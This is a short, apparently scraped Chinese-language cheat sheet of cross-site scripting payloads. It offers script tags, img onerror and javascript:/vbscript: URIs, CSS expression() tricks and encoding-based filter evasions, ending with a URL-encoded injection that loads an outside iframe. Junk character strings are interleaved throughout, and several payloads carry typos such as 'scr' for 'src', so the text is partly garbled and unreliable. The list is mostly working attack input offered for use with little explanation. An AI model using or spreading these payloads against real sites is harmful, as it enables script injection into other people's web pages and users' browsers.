<script>alert("跨站")</script> (最常用)
8 z6 R# ]0 u. B! i3 v<img scr=javascript:alert("跨站")></img>2 x2 U) z/ S f/ V
<img scr="javascript: alert(/跨站/)></img>. \: b1 _' g' X3 A! N5 w8 [
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
4 z1 Q% V% U L2 r3 ^1 u<img scr="#" onerror=alert(/跨站/)></img>+ K4 o+ d; b' e; _8 Y/ `
<img scr="#" style="xss:expression(alert(/xss/));"></img>4 \. Q' _% G6 c2 @8 S: N
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 N1 o! ]5 Z+ O' N! [: K1 ]( t<img src=vbscript:msgbox ("xss")></img>2 D. E/ t" I( v: _' P$ o4 F
<style> input {left:expression (alert('xss'))}</style>& k0 ?5 i p" E" R, W0 b
<div style={left:expression (alert('xss'))}></div>
! ~# p( V+ \1 Q4 j. B9 U4 W<div style={left:exp/* */ression (alert('xss'))}></div>9 @% V; G t" Q/ H. J
<div style={left:\0065\0078ression (alert('xss'))}></div>! I/ t6 J' Q2 [/ V$ H6 C" K
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>/ z) R N# t! x o& b& a$ I+ d' q
unicode <div style="{left:expRessioN (alert('xss'))}">
2 i4 Y2 n# v4 ~. I. H4 m
. \% C# b" X- @& e2 l"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["0 u6 Q: ?# L+ V y W1 N
|